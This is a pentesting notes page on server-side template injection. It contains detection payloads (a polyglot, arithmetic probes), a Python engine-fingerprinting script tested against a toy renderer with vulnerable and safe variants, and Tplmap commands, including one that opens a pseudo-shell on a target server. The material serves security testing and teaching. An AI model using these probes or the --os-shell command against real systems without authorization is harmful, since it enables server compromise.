# SSTI

### What is SSTI?

Server-side template injection (SSTI) is a vulnerability in which untrusted user input is embedded into the *source text* of a template, rather than being passed to the template as data, before the template engine compiles and renders it. Because template engines expose an expression language (and usually a path to the underlying runtime), an attacker who controls part of the template can evaluate arbitrary expressions on the server, which in most engines can be escalated to remote code execution (RCE).

Some of the most common template engines, grouped by language:

* PHP – Smarty, Twig
* Java – Velocity, FreeMarker
* Python – Jinja2, Mako, Tornado
* JavaScript – Jade (now Pug), Rage
* Ruby – Liquid, ERB

### How Does It Work?

For the sake of simplicity, imagine you are testing the `parameter` field of the following POST request:

```http
POST /some-endpoint HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded

parameter=value
```

To detect the vulnerability, send a polyglot payload as the value of the parameter. The polyglot is a short string made of the delimiter characters used by several engines at once (`${`, `{{`, `<%`, `[%`, `#`), so if the value reaches a template engine it will almost certainly trigger a parse error:

```http
POST /some-endpoint HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded

parameter=${{<%[%'"}}%\.
```

The value is shown raw here for readability; in a real request it must be URL-encoded, otherwise the bare `%` and quote characters are mangled by the form parser before they ever reach the template engine.

To identify the template engine, read the error message; verbose error pages frequently leak the engine's name, a stack trace, or a template-specific line/column reference:

![](/files/igSx8kuYS3mSbXIYujbM)

If the error message does not reveal the engine (or the application swallows errors), test the known expression syntaxes of the popular engines and look for the arithmetic result (`49`) in the response:

```
{{7*7}}       Jinja2, Twig (and other Mustache-style engines)
${7*7}        FreeMarker, Velocity, Mako
<%= 7*7 %>    ERB, EJS
${{7*7}}      hybrid probe covering both ${...} and {{...}} engines
#{7*7}        Pug/Jade, Ruby string interpolation
```

A probe only counts as evaluated when the result appears *and* the probe text itself is gone: a page that reflects `{{7*7}}` back unchanged is not vulnerable. Once `{{7*7}}` returns `49`, `{{7*'7'}}` separates the two most common engines: Jinja2 applies Python semantics and returns `7777777`, while Twig coerces the string to a number and returns `49`.
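The vulnerable-versus-safe rendering pattern from the definition above, and the probe-and-fingerprint procedure just described, as an added worked example (this is not code from the original page). It is stdlib-only: `toy_render` is a constructed stand-in for a Jinja2-style engine so the script runs offline, and `fingerprint` takes a `send` callable so it can be pointed at the stand-in or at a real HTTP client. The engine-identification tree (`a{*comment*}b` for Smarty, `${"z".join("ab")}` for Mako, `{{7*'7'}}` to split Jinja2 from Twig) follows the page's probe list; the function and variable names are this example's own.

```python
import re
from urllib.parse import urlencode

# Polyglot from the page: hits the delimiters of several engines at once so a
# template parse error (often naming the engine) surfaces.
POLYGLOT = "${{<%[%'\"}}%\\."


def encode_form(param, payload):
    """URL-encode a probe as an application/x-www-form-urlencoded body.
    The polyglot carries bare '%' and quote characters, so sending it raw
    would be mangled by the server's form parser before reaching the engine."""
    return urlencode({param: payload})


def evaluated(body, probe, expected):
    """A probe counts as evaluated only if the result shows up AND the raw
    probe text is gone: a page that merely echoes '{{7*7}}' is not vulnerable."""
    return expected in body and probe not in body


def polyglot_error(send):
    """Fire the polyglot and report the exception class, standing in for the
    stack trace a verbose error page would leak. None means no parse error."""
    try:
        send(POLYGLOT)
    except Exception as exc:  # the toy engine raises; a real target returns an error page
        return type(exc).__name__
    return None


def fingerprint(send):
    """Walk the probe tree. `send(payload)` must return the response body.
    Returns an engine guess, or None if nothing was evaluated."""
    if evaluated(send("${7*7}"), "${7*7}", "49"):
        # ${...} evaluated: Smarty honours {* *} block comments, Mako runs Python.
        if evaluated(send("a{*comment*}b"), "a{*comment*}b", "ab"):
            return "Smarty"
        if evaluated(send('${"z".join("ab")}'), '${"z".join("ab")}', "zab"):
            return "Mako"
        return "unknown (${...} evaluated)"
    if evaluated(send("{{7*7}}"), "{{7*7}}", "49"):
        # {{...}} evaluated: Jinja2 repeats the string (Python semantics),
        # Twig coerces '7' to a number and still gives 49.
        body = send("{{7*'7'}}")
        if "7777777" in body:
            return "Jinja2"
        if "49" in body:
            return "Twig"
        return "unknown ({{...}} evaluated)"
    if evaluated(send("<%= 7*7 %>"), "<%= 7*7 %>", "49"):
        return "ERB/EJS-style engine"
    if evaluated(send("#{7*7}"), "#{7*7}", "49"):
        return "Pug/Jade-style interpolation"
    return None


# ---- constructed target (NOT a real template engine) -------------------------
_TAG = re.compile(r"\{\{(.*?)\}\}")


def toy_render(template, ctx):
    """Stand-in for a Jinja2-style engine: each {{ expr }} in the TEMPLATE TEXT
    is evaluated as a Python expression with `ctx` as its variables. Real engines
    differ in detail; the property that matters is the same: expressions are
    found in the template source, never inside substituted data."""
    def sub(match):
        return str(eval(match.group(1).strip(), {"__builtins__": {}}, dict(ctx)))
    return _TAG.sub(sub, template)


def render_vulnerable(user_input):
    """The SSTI bug: user input is concatenated into the template source, so any
    {{ ... }} it contains becomes an expression the engine evaluates."""
    return toy_render("Hello " + user_input, {})


def render_safe(user_input):
    """The fix: the template is a fixed string and user input is passed as a
    context variable. It is substituted once and never re-parsed for delimiters."""
    return toy_render("Hello {{ name }}", {"name": user_input})


if __name__ == "__main__":
    print(encode_form("parameter", POLYGLOT))
    for name, target in (("vulnerable", render_vulnerable), ("safe", render_safe)):
        print(name, "polyglot ->", polyglot_error(target), "| engine ->", fingerprint(target))
```

To use `fingerprint` against a real application, replace the stand-in with a function that submits `encode_form("parameter", payload)` to the endpoint and returns the response text; the tree itself does not change.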

## Exploit

### Tools

#### [Tplmap](https://github.com/epinna/tplmap)

Tplmap automates the detection and exploitation steps above. It runs under Python 2.7, and the `*` in the URL marks the injection point:

```bash
# detect the engine at the '*' and, if possible, drop into a pseudo-shell on the server
python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
# detection only, injecting into the "user" parameter
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
# --level raises the number of payloads tried; -e forces a specific engine (here Jade)
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
```

Links:

{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md" %}

{% embed url="https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti" %}

{% embed url="https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection" %}
